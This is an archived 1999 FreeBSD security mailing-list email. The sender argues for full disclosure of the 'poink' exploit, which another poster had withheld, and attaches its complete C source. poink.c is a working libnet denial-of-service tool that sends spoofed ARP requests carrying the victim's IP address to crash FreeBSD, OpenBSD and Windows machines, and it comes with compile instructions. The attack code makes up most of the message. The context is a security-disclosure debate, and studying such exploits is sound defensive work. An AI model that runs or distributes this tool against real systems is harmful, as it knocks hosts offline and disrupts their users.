Date: Mon, 19 Apr 1999 19:54:07 +0200 From: Harold Gutch <logix@foobar.franken.de> To: Chris <freebsd@hiway1.exit109.com>, The Tech-Admin Dude <geniusj@phoenix.unacom.com> Cc: security@FreeBSD.ORG Subject: Re: poink and freebsd Message-ID: <19990419195407.A6439@foobar.franken.de> In-Reply-To: <Pine.BSF.3.96.990419130911.20749A-100000@hiway1.exit109.com>; from Chris on Mon, Apr 19, 1999 at 01:10:08PM -0400 References: <Pine.BSF.4.10.9904191304590.68697-100000@phoenix.unacom.com> <Pine.BSF.3.96.990419130911.20749A-100000@hiway1.exit109.com>
next in thread | previous in thread | raw e-mail | index | archive | help
--xXmbgvnjoT4axfJE Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename=muttIQ6439 On Mon, Apr 19, 1999 at 01:10:08PM -0400, Chris wrote: > jd- > > id rather not post the source to the list, since this is how exploits get > distributed, and bad things occur. i sent email to the security-officer, > and a few people to test it out with their setup.. id rather not > distribute it any further... i hope you understand my reasoning behind it > :/ > > > On Mon, 19 Apr 1999, Robert Watson wrote: > > > > > On Mon, 19 Apr 1999, Chris wrote: > > > > > > > im sure ya'll have heard of poink, an exploit against freebsd/openbsd > > > > machines (these are the boxes i have tested on) it appears to work very > > > > efficiently in killing freebsd 3.1 - freebsd 3.0 machines, against one of > > > > our freebsd 2.2.5 machines, it did bring up the error messages in > > > > /var/log/messages (arp lookups) but didnt kill the machine like the > > > > others... > > > > > > > > im just wondering if there are any patches for this, and i noticed there > > > > is no mention of it on freebsd's website.... > > > > > > Interestingly, I haven't heard about this one, and it doesn't appear to be > > > on rootshell, etc. Chris, the fact that _you_ as somebody outside of the circles close to the original author (which I simply assume) already have it, shows that it already is public. Posting it to this list will distribute it to more people, some of which might use it maliciosly, others though might fix it faster than it would be fixed otherwise. Keeping it secret doesn't help anything, this is similar to proprietary programs/protocols, which in many cases are inferior to open source or open protocols. You should get some information about "full disclosure" and read it. Anyway, I was able to find the source for poink after searching for 5 minutes. As I don't have libnet installed (and I don't plan to install it just to compile poink), I am not able to say anything about what it does - perhaps somebody else can do so. bye, Harold -- <Shabby> Sleep is an abstinence syndrome wich occurs due to lack of caffein. Wed Mar 4 04:53:33 CET 1998 #unix, ircnet --xXmbgvnjoT4axfJE Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename="poink.c" /* * $Id$ * * poink.c - NT/9x DOS attack * * Code: * Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com> * route|daemon9 <route@infonexus.com> * All rights reserved. * * Original Idea: * Joel Jacobson (joel@mobila.cx) * * This simple exploit was written as per the specification from Joel * Jacobson's bugtraq post (http://geek-girl.com/bugtraq/1999_1/1299.html). * * Needs libnet 0.99. * Currently: http://lazy.accessus.net/~route/libnet * Soon: http://www.packetfactory.net/ * * gcc poink.c -o poink -lnet * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * */ #include <libnet.h> u_char enet_src[6] = {0x00, 0x0d, 0x0e, 0x0a, 0x0d, 0x00}; u_char enet_dst[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff}; int send_arp(struct link_int *, u_long, u_char *); void usage(u_char *); int main(int argc, char *argv[]) { int c, amount; char errbuf[256]; char *device = NULL; struct link_int *l; u_long ip; amount = 20; while ((c = getopt(argc, argv, "n:i:")) != EOF) { switch (c) { case 'i': device = optarg; break; case 'n': amount = atoi(optarg); break; default: exit(EXIT_FAILURE); } } if (!device) { usage(argv[0]); exit(EXIT_FAILURE); } if (argc <= optind) { usage(argv[0]); exit(EXIT_FAILURE); } else if ((ip = libnet_name_resolve(argv[optind], 1)) == -1) { fprintf(stderr, "Cannot resolve IP address\n"); exit(EXIT_FAILURE); } l = libnet_open_link_interface(device, errbuf); if (!l) { fprintf(stderr, "libnet_open_link_interface: %s\n", errbuf); exit(EXIT_FAILURE); } while (amount--) { c = send_arp(l, ip, device); if (c == -1) { /* bail on the first error */ break; } } printf("\n"); return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS); } int send_arp(struct link_int *l, u_long ip, u_char *device) { int n; u_char *buf; if (libnet_init_packet(ARP_H + ETH_H, &buf) == -1) { perror("libnet_init_packet memory:"); exit(EXIT_FAILURE); } /* * Ethernet header */ libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_ARP, NULL, 0, buf); /* * ARP header */ libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP, 6, 4, ARPOP_REQUEST, enet_src, (u_char *)&ip, enet_dst, (u_char *)&ip, NULL, 0, buf + ETH_H); n = libnet_write_link_layer(l, device, buf, ARP_H + ETH_H); fprintf(stderr, "."); libnet_destroy_packet(&buf); return (n); } void usage(u_char *name) { fprintf(stderr, "%s -i interface [-n amount] ip\n", name); } --xXmbgvnjoT4axfJE-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?19990419195407.A6439>